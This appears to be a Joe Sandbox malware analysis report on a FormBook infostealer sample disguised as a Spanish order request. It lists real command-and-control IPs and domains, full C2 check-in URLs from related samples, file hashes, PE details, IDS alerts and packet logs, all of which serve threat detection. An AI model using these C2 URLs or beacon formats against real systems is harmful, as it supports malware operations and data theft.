                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      199.192.22.198
                                                                      		www.specigain.onlineUnited States
                                                                      		22612NAMECHEAP-NETUStrue
                                                                      148.251.13.126
                                                                      		gachthe365.siteGermany
                                                                      		24940HETZNER-ASDEtrue
                                                                      91.195.240.117
                                                                      		www.nativealternatives.comGermany
                                                                      		47846SEDO-ASDEtrue
                                                                      81.169.145.158
                                                                      		krankenzusatz.netGermany
                                                                      		6724STRATOSTRATOAGDEtrue
                                                                      81.169.145.72
                                                                      		frogair.onlineGermany
                                                                      		6724STRATOSTRATOAGDEtrue
                                                                      185.53.177.54
                                                                      		www.verde-amar.infoGermany
                                                                      		61969TEAMINTERNET-ASDEtrue
                                                                      81.17.29.148
                                                                      		www.heroclassicrally.co.ukSwitzerland
                                                                      		51852PLI-ASCHtrue
                                                                      81.17.29.149
                                                                      		www.jewelryimpact.comSwitzerland
                                                                      		51852PLI-ASCHtrue
                                                                      75.102.22.168
                                                                      		hotelyeah.topUnited States
                                                                      		23352SERVERCENTRALUStrue

                                                                      General Information

                                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                      Analysis ID:814048
                                                                      Start date and time:2023-02-23 11:16:13 +01:00
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 15s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:8
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample file name:Requisito de pedido #23022300.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/2@16/9
                                                                      EGA Information:
                                                                      • Successful, ratio: 66.7%
                                                                      HDC Information:
                                                                      • Successful, ratio: 59.2% (good quality ratio 53.2%)
                                                                      • Quality average: 71.9%
                                                                      • Quality standard deviation: 32.2%
                                                                      HCA Information:
                                                                      • Successful, ratio: 90%
                                                                      • Number of executed functions: 99
                                                                      • Number of non-executed functions: 209
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                                      • Execution Graph export aborted for target Requisito de pedido #23022300.exe, PID 4952 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      11:17:29API Interceptor500x Sleep call for process: explorer.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      199.192.22.198SecuriteInfo.com.Win32.PWSX-gen.8070.29220.exeGet hashmaliciousFormBookBrowse
                                                                      • www.payfit.website/tofc/?39l=IRt/M24wURE2aaX8+SzwJQ9tI30R+qTL+7tRac46OvqHz6obHf7y9XwNjDZxgLR61yG8n0+pewToDIqIxJDbzBCPEqgP3E8HZg==&66=LnKQtaMZwDzwn
                                                                      swift_ref00056.exeGet hashmaliciousFormBookBrowse
                                                                      • www.tomart.live/xgu6/?ogq5_c=8YnFElfcfcnZ-&YG9Z_=sqxf7d9XntX7FqmKeIfITZoTmNbK4vWKcBI6e2e69E+eRLc60lAP2Yi33EESH6TH63r0wfycYyUizIB4DE718NzHAa7ay97Vbg==
                                                                      Pfizer Request for Quotation P1072023.comGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.dealsharp.site/ae5v/?qks3=Uvy7j&1leFZN7E=mQsIAJu5cwKKzfEUTd3WgxsprbXsvYWpFqma/PwmJtajBcawxtoo/w0l9IrkuRc/KKZ1RmdE8D8D31QFelduhIXs5Mcu1WWpUg==
                                                                      WSNMBRTSK002023.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.dealsharp.site/ae5v/?TT14jm=iCcyt&7sEseW=mQsIAJu5cwKKzfEUTd3WgxsprbXsvYWpFqma/PwmJtajBcawxtoo/w0l9IrkuRc/KKZ1RmdE8D8D31QFelduhIXs5Mcu1WWpUg==
                                                                      Pepsico LLC RFQ Information.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.dealsharp.site/ae5v/?NebQC5j=mQsIAJu5cwKKzfEUTd3WgxsprbXsvYWpFqma/PwmJtajBcawxtoo/w0l9IrkuRc/KKZ1RmdE8D8D31QFelduhIXs5Mcu1WWpUg==&q8uSxc=WZmzEi
                                                                      Ponticello.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.prosmarketing.site/ngqb/?NLi6q-=NguoeGzcpL7UkEEeChpXGjG7jmqVJPtPDkvQqkNiDKsZHeCWJnk/oubf0CkcnhoZgfk7vag0RAETy5D1/cqboZKrL8ySGaeg7Q==&ZM=JwJFIofD448CNMXZ
                                                                      HSBC Payment Advice.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.dealsharp.site/ae5v/?ryyDt=L6yygtbd&oYGKdEP=mQsIAJu5cwKKzfEUTd3WgxsprbXsvYWpFqma/PwmJtajBcawxtoo/w0l9IrkuRc/KKZ1RmdE8D8D31QFelduhIXs5Mcu1WWpUg==
                                                                      212fb.exeGet hashmaliciousFormBookBrowse
                                                                      • www.payfit.website/tofc/?ZR=IRt/M24wURE2aaX8+SzwJQ9tI30R+qTL+7tRac46OvqHz6obHf7y9XwNjDZxgLR61yG8n0+pewToDIqIxJDbzBCPEqgP3E8HZg==&TbA=T1XYl6cJVa
                                                                      HSBC Payment Advice.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.dealsharp.site/ae5v/?MfL4xG07=mQsIAJu5cwKKzfEUTd3WgxsprbXsvYWpFqma/PwmJtajBcawxtoo/w0l9IrkuRc/KKZ1RmdE8D8D31QFelduhIXs5Mcu1WWpUg==&MTqw=BfB4
                                                                      Confirmation_10Feb2023_102510.exeGet hashmaliciousFormBookBrowse
                                                                      • www.payfit.website/tofc/?O8-wDV=IRt/M24wURE2aaX8+SzwJQ9tI30R+qTL+7tRac46OvqHz6obHf7y9XwNjDZxgLR61yG8n0+pewToDIqIxJDbzAqodswPlU0eZg==&xOHt=Nd64
                                                                      Requisito ordine n. 230210.exeGet hashmaliciousFormBookBrowse
                                                                      • www.specigain.online/vqh7/?u1ua=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmrZxModizUJoJg==&4sHXq=qmMaHdA-N1MF
                                                                      WKPSNTQR90002023.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.dealsharp.site/ae5v/
                                                                      Pneumographic.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.prosmarketing.site/ngqb/?RAGsfTD=NguoeGzcpL7UkEEeChpXGjG7jmqVJPtPDkvQqkNiDKsZHeCWJnk/oubf0CkcnhoZgfk7vag0RAETy5D1/cqboZKrL8ySGaeg7Q==&Y4Ln=PPCF
                                                                      abc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.dealsharp.site/ae5v/?2-=ffWnii2d1IOkQfE0&ZgVA7L=mQsIAJu5cwKKzfEUTd3WgxsprbXsvYWpFqma/PwmJtajBcawxtoo/w0l9IrkuRc/KKZ1RmdE8D8D31QFelduhIXs5Mcu1WWpUg==

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      www.heroclassicrally.co.ukwHUcKenhaK.exeGet hashmaliciousFormBookBrowse
                                                                      • 81.17.29.150
                                                                      4mccnnGNf7.exeGet hashmaliciousFormBookBrowse
                                                                      • 81.17.29.146
                                                                      www.nativealternatives.comRequisito ordine n. 230210.exeGet hashmaliciousFormBookBrowse
                                                                      • 91.195.240.117
                                                                      www.jewelryimpact.comPfizer Request for Quotation P1072023.comGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 63.141.242.46
                                                                      Requisito ordine n. 230210.exeGet hashmaliciousFormBookBrowse
                                                                      • 81.17.18.198
                                                                      b2mb9ypaoG.exeGet hashmaliciousFormBookBrowse
                                                                      • 81.17.29.148

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      HETZNER-ASDEIulIJdo87Y.exeGet hashmaliciousRedLineBrowse
                                                                      • 116.203.73.33
                                                                      yDqtHI9md6.exeGet hashmaliciousUnknownBrowse
                                                                      • 148.251.236.201
                                                                      yDqtHI9md6.exeGet hashmaliciousUnknownBrowse
                                                                      • 148.251.236.201
                                                                      Swift-Ref0020385993.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 148.251.213.218
                                                                      TTres2222023.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 88.99.90.21
                                                                      7pjhVL87ft.exeGet hashmaliciousAmadey, Fabookie, Glupteba, Nymaim, PrivateLoader, RedLine, SmokeLoaderBrowse
                                                                      • 148.251.234.83
                                                                      QZc18qviTy.exeGet hashmaliciousFormBookBrowse
                                                                      • 168.119.99.80
                                                                      file.exeGet hashmaliciousRedLineBrowse
                                                                      • 168.119.228.126
                                                                      wHUcKenhaK.exeGet hashmaliciousFormBookBrowse
                                                                      • 168.119.99.80
                                                                      VArbRLoyWq.exeGet hashmaliciousSocelarsBrowse
                                                                      • 148.251.234.83
                                                                      file.exeGet hashmaliciousSocelarsBrowse
                                                                      • 148.251.234.93
                                                                      http://www.igg-games.comGet hashmaliciousUnknownBrowse
                                                                      • 213.239.209.209
                                                                      Revised PO..exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 88.198.103.172
                                                                      kC5gh19fux.exeGet hashmaliciousRHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                      • 144.76.136.153
                                                                      EksRd2mRLH.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                      • 78.46.224.133
                                                                      Hb0DLKLnab.exeGet hashmaliciousDjvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                      • 144.76.136.153
                                                                      Inward-Remittance02233020395.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 168.119.150.187
                                                                      kZBCT8RfG4.exeGet hashmaliciousDanaBot, Djvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                      • 144.76.136.153
                                                                      https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjlmJnPgqn9AhULtosKHS7EDfwQFnoECAkQAQ&url=http%3A%2F%2Fadventure.travelduck.pl%2FWOtMuAn.htm&usg=AOvVaw1Ceq1rAdKR9nZSa2Y-xZdkGet hashmaliciousUnknownBrowse
                                                                      • 168.119.8.212
                                                                      V35rbFHxte.exeGet hashmaliciousRHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                      • 144.76.136.153
                                                                      NAMECHEAP-NETUSE-DEKONT#22022023.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 198.187.31.254
                                                                      ABB Inspection.exeGet hashmaliciousFormBookBrowse
                                                                      • 63.250.35.33
                                                                      TBC-770385659090_001230223.vbsGet hashmaliciousFormBookBrowse
                                                                      • 63.250.35.33
                                                                      Materials and Drawing.exeGet hashmaliciousFormBookBrowse
                                                                      • 192.64.118.189
                                                                      HSBC Payment Advice _pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 192.64.116.162
                                                                      QZc18qviTy.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.27.238
                                                                      INQUIRY ORDER.pdf .exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 198.54.120.122
                                                                      SecuriteInfo.com.Win32.PWSX-gen.8070.29220.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.22.198
                                                                      ZAFKR7CpBq.exeGet hashmaliciousFormBookBrowse
                                                                      • 192.64.116.162
                                                                      wHUcKenhaK.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.27.238
                                                                      121123202.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.31.98
                                                                      121123202.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.31.98
                                                                      swift_ref00056.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.22.198
                                                                      Request-22.25-2023.vbsGet hashmaliciousFormBookBrowse
                                                                      • 63.250.35.33
                                                                      YIqZ253T62.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 198.54.117.242
                                                                      PARTS INQUIRIES.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.192.30.193
                                                                      Pfizer Request for Quotation P1072023.comGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.192.22.198
                                                                      9Y0iIDL2cA.exeGet hashmaliciousFormBookBrowse
                                                                      • 198.54.117.210
                                                                      INQUIRY DATA SHEET.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                      • 198.54.120.122
                                                                      WSNMBRTSK002023.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.192.22.198

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Requisito de pedido #23022300.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\Requisito de pedido #23022300.exe
                                                                      File Type:CSV text
                                                                      Category:dropped
                                                                      Size (bytes):226
                                                                      Entropy (8bit):5.354940450065058
                                                                      Encrypted:false
                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                      MD5:B10E37251C5B495643F331DB2EEC3394
                                                                      SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                      SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                      SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                      Malicious:true
                                                                      Reputation:high, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

                                                                      C:\Users\user\AppData\Local\Temp\50-ET7Wv7

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\chkdsk.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):94208
                                                                      Entropy (8bit):1.2880737026424216
                                                                      Encrypted:false
                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                                      MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                                      SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                                      SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                                      SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.904098881180874
                                                                      TrID:
                                                                      • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                      • Win64 Executable GUI (202006/5) 46.43%
                                                                      • Win64 Executable (generic) (12005/4) 2.76%
                                                                      • Generic Win/DOS Executable (2004/3) 0.46%
                                                                      • DOS Executable Generic (2002/1) 0.46%
                                                                      File name:Requisito de pedido #23022300.exe
                                                                      File size:724480
                                                                      MD5:8a06791059a482faa0cf845d2b953351
                                                                      SHA1:37a236b4bea30fd46aefed9f8095b8c7989f0243
                                                                      SHA256:f9b608b8ea15f9e8148eaa73ea96e2eff983b808f9d0cb2f27d833ebebc165f8
                                                                      SHA512:087e27c38f4d982ecf2741d37e013c3bd49e539b9e234bf3b18989dc3871547bb0b8072e5108bfff3df82153f7201e8c49f851300870a6b042c7bc2f536ec8ba
                                                                      SSDEEP:12288:SPJGinDLjolG1e+ASVTsirGDGFyhMfJk+2EEQLYb/voPDNstJpbjoA:eBnDbZASVTsirGDGFyKk+A/v22zpr
                                                                      TLSH:EDF40101B7494F55DEA410F084E3811923E2994F3EB7DA967C881BF6AE05BD7CCCD28A
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....................0.................. ....@...... .......................`............`...@......@............... .....

                                                                      File Icon

                                                                      Icon Hash:00828e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x400000
                                                                      Entrypoint Section:
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0xF9E48702 [Thu Nov 9 08:19:14 2102 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      dec ebp
                                                                      pop edx
                                                                      nop
                                                                      add byte ptr [ebx], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax+eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x5a8.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb25120x1c.text
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000xb05600xb0600False0.9128430080616584data7.9087063805652695IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xb40000x5a80x600False0.419921875data4.115198390820468IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_VERSION0xb40a00x31cdata
                                                                      RT_MANIFEST0xb43bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      192.168.2.481.17.29.14949697802031412 02/23/23-11:17:57.595597TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.481.17.29.149
                                                                      192.168.2.4148.251.13.12649701802031449 02/23/23-11:18:23.247083TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970180192.168.2.4148.251.13.126
                                                                      192.168.2.4148.251.13.12649701802031412 02/23/23-11:18:23.247083TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970180192.168.2.4148.251.13.126
                                                                      192.168.2.481.17.29.14949697802031453 02/23/23-11:17:57.595597TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.481.17.29.149
                                                                      192.168.2.4148.251.13.12649701802031453 02/23/23-11:18:23.247083TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970180192.168.2.4148.251.13.126
                                                                      192.168.2.481.17.29.14949697802031449 02/23/23-11:17:57.595597TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.481.17.29.149
                                                                      192.168.2.48.8.8.860686532023883 02/23/23-11:18:43.574078UDP2023883ET DNS Query to a *.top domain - Likely Hostile6068653192.168.2.48.8.8.8

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Feb 23, 2023 11:17:44.871233940 CET4969580192.168.2.4185.53.177.54
                                                                      Feb 23, 2023 11:17:44.890808105 CET8049695185.53.177.54192.168.2.4
                                                                      Feb 23, 2023 11:17:44.890995026 CET4969580192.168.2.4185.53.177.54
                                                                      Feb 23, 2023 11:17:44.911392927 CET8049695185.53.177.54192.168.2.4
                                                                      Feb 23, 2023 11:17:44.947619915 CET4969580192.168.2.4185.53.177.54
                                                                      Feb 23, 2023 11:17:44.967371941 CET8049695185.53.177.54192.168.2.4
                                                                      Feb 23, 2023 11:17:44.967410088 CET8049695185.53.177.54192.168.2.4
                                                                      Feb 23, 2023 11:17:44.967431068 CET8049695185.53.177.54192.168.2.4
                                                                      Feb 23, 2023 11:17:44.967564106 CET4969580192.168.2.4185.53.177.54
                                                                      Feb 23, 2023 11:17:44.969851971 CET4969580192.168.2.4185.53.177.54
                                                                      Feb 23, 2023 11:17:44.989506006 CET8049695185.53.177.54192.168.2.4
                                                                      Feb 23, 2023 11:17:55.035701036 CET4969680192.168.2.481.17.29.149
                                                                      Feb 23, 2023 11:17:55.055529118 CET804969681.17.29.149192.168.2.4
                                                                      Feb 23, 2023 11:17:55.055628061 CET4969680192.168.2.481.17.29.149
                                                                      Feb 23, 2023 11:17:55.055804968 CET4969680192.168.2.481.17.29.149
                                                                      Feb 23, 2023 11:17:55.075560093 CET804969681.17.29.149192.168.2.4
                                                                      Feb 23, 2023 11:17:55.082740068 CET804969681.17.29.149192.168.2.4
                                                                      Feb 23, 2023 11:17:55.082895994 CET804969681.17.29.149192.168.2.4
                                                                      Feb 23, 2023 11:17:55.082998991 CET4969680192.168.2.481.17.29.149
                                                                      Feb 23, 2023 11:17:56.559412956 CET4969680192.168.2.481.17.29.149
                                                                      Feb 23, 2023 11:17:57.575467110 CET4969780192.168.2.481.17.29.149
                                                                      Feb 23, 2023 11:17:57.595367908 CET804969781.17.29.149192.168.2.4
                                                                      Feb 23, 2023 11:17:57.595480919 CET4969780192.168.2.481.17.29.149
                                                                      Feb 23, 2023 11:17:57.595597029 CET4969780192.168.2.481.17.29.149
                                                                      Feb 23, 2023 11:17:57.615314960 CET804969781.17.29.149192.168.2.4
                                                                      Feb 23, 2023 11:17:57.623327971 CET804969781.17.29.149192.168.2.4
                                                                      Feb 23, 2023 11:17:57.623393059 CET804969781.17.29.149192.168.2.4
                                                                      Feb 23, 2023 11:17:57.623558044 CET4969780192.168.2.481.17.29.149
                                                                      Feb 23, 2023 11:17:57.623728037 CET4969780192.168.2.481.17.29.149
                                                                      Feb 23, 2023 11:17:57.643409014 CET804969781.17.29.149192.168.2.4
                                                                      Feb 23, 2023 11:18:02.782536983 CET4969880192.168.2.4199.192.22.198
                                                                      Feb 23, 2023 11:18:02.957505941 CET8049698199.192.22.198192.168.2.4
                                                                      Feb 23, 2023 11:18:02.957710028 CET4969880192.168.2.4199.192.22.198
                                                                      Feb 23, 2023 11:18:02.957859993 CET4969880192.168.2.4199.192.22.198
                                                                      Feb 23, 2023 11:18:03.132057905 CET8049698199.192.22.198192.168.2.4
                                                                      Feb 23, 2023 11:18:03.293205976 CET8049698199.192.22.198192.168.2.4
                                                                      Feb 23, 2023 11:18:03.293237925 CET8049698199.192.22.198192.168.2.4
                                                                      Feb 23, 2023 11:18:03.293462038 CET4969880192.168.2.4199.192.22.198
                                                                      Feb 23, 2023 11:18:04.468365908 CET4969880192.168.2.4199.192.22.198
                                                                      Feb 23, 2023 11:18:05.669050932 CET4969980192.168.2.4199.192.22.198
                                                                      Feb 23, 2023 11:18:05.845416069 CET8049699199.192.22.198192.168.2.4
                                                                      Feb 23, 2023 11:18:05.845557928 CET4969980192.168.2.4199.192.22.198
                                                                      Feb 23, 2023 11:18:06.359770060 CET4969980192.168.2.4199.192.22.198
                                                                      Feb 23, 2023 11:18:06.536230087 CET8049699199.192.22.198192.168.2.4
                                                                      Feb 23, 2023 11:18:06.680440903 CET8049699199.192.22.198192.168.2.4
                                                                      Feb 23, 2023 11:18:06.680479050 CET8049699199.192.22.198192.168.2.4
                                                                      Feb 23, 2023 11:18:06.680701971 CET4969980192.168.2.4199.192.22.198
                                                                      Feb 23, 2023 11:18:06.707140923 CET4969980192.168.2.4199.192.22.198
                                                                      Feb 23, 2023 11:18:06.883635044 CET8049699199.192.22.198192.168.2.4
                                                                      Feb 23, 2023 11:18:20.669044971 CET4970080192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:20.692111969 CET8049700148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:20.692404985 CET4970080192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:20.692512035 CET4970080192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:20.715698957 CET8049700148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:20.716753006 CET8049700148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:20.716834068 CET8049700148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:20.716922998 CET4970080192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:20.718312979 CET8049700148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:20.718359947 CET8049700148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:20.718390942 CET8049700148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:20.718539953 CET4970080192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:22.202140093 CET4970080192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:23.223433018 CET4970180192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:23.246818066 CET8049701148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:23.246965885 CET4970180192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:23.247082949 CET4970180192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:23.270210028 CET8049701148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:23.271050930 CET8049701148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:23.271091938 CET8049701148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:23.271131039 CET8049701148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:23.271167040 CET8049701148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:23.271172047 CET4970180192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:23.271204948 CET8049701148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:23.271244049 CET8049701148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:23.271279097 CET4970180192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:23.271281004 CET8049701148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:23.271318913 CET8049701148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:23.271338940 CET4970180192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:23.271346092 CET8049701148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:23.271425962 CET4970180192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:23.271465063 CET4970180192.168.2.4148.251.13.126
                                                                      Feb 23, 2023 11:18:23.271676064 CET4970180192.168.2.4148.251.13.126
